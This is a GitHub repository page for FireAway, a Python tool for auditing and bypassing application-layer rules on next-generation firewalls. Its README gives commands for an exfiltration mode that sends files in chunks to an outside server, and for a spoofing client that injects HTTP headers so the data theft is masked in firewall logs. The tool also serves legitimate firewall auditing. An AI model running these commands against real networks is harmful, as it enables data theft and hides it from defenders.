Skip to content

Next Generation Firewall Audit and Bypass Tool

Notifications You must be signed in to change notification settings

Ghostuprise/Fireaway

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

16 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

FireAway-Next Generation Firewall Bypass Tool

v0.1

Fireaway is a tool for auditing, bypassing, and exfiltrating data against layer 7/AppID inspection rules on next generation firewalls. These tactics are based on the principle of having to allow connections to establish through the NGFW in order to see layer 7 data to filter, as well as spoofing applications to hide communication channels inside the firewall logs as normal user traffic, such as Internet surfing.

Starting the FireAway Server: Typically the FireAway server would be started on the egress side of the firewall (such as a server on the Internet), and listen on a port believed to be closed to see if any application based rules allow traffic out on this port:

python fa_server.py <port to listen on>

All data received by the server on this port will be saved to the file ReceivedData.txt in the directory the server was launched from. If the server detects differing sizes in the amount of data received (indicating firewall filtering has kicked in), this output will be shown on the server console:

Got the same or lower amount of data on two consecutive runs.  If sending test data, maximum data leak size may have been reached.

Starting the FireAway Client/Application Spoofer: The FireAway client has two modes:

  • Test mode (mode 0)-Send random data in incrementing chunk sizes to see how much data can be sent before the firewall AppID engages and stops traffic flow.
  • Exfiltration mode (mode 1)-Open a file and send it in chunks through the firewall.

To start the basic client:

python fa_client.py <FireAway server IP> <Fireaway Server Port> <Client mode (0 or 1)>

To start the application spoofing client:

python fa_spoof.py <FireAway Server IP> <Fireaway Server Port> <Client mode (0 or 1)>

Application spoofing will randomly insert HTTP headers with the data chunks to pollute the logs with various applications in order to mask the data exfiltration.

About

Next Generation Firewall Audit and Bypass Tool

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%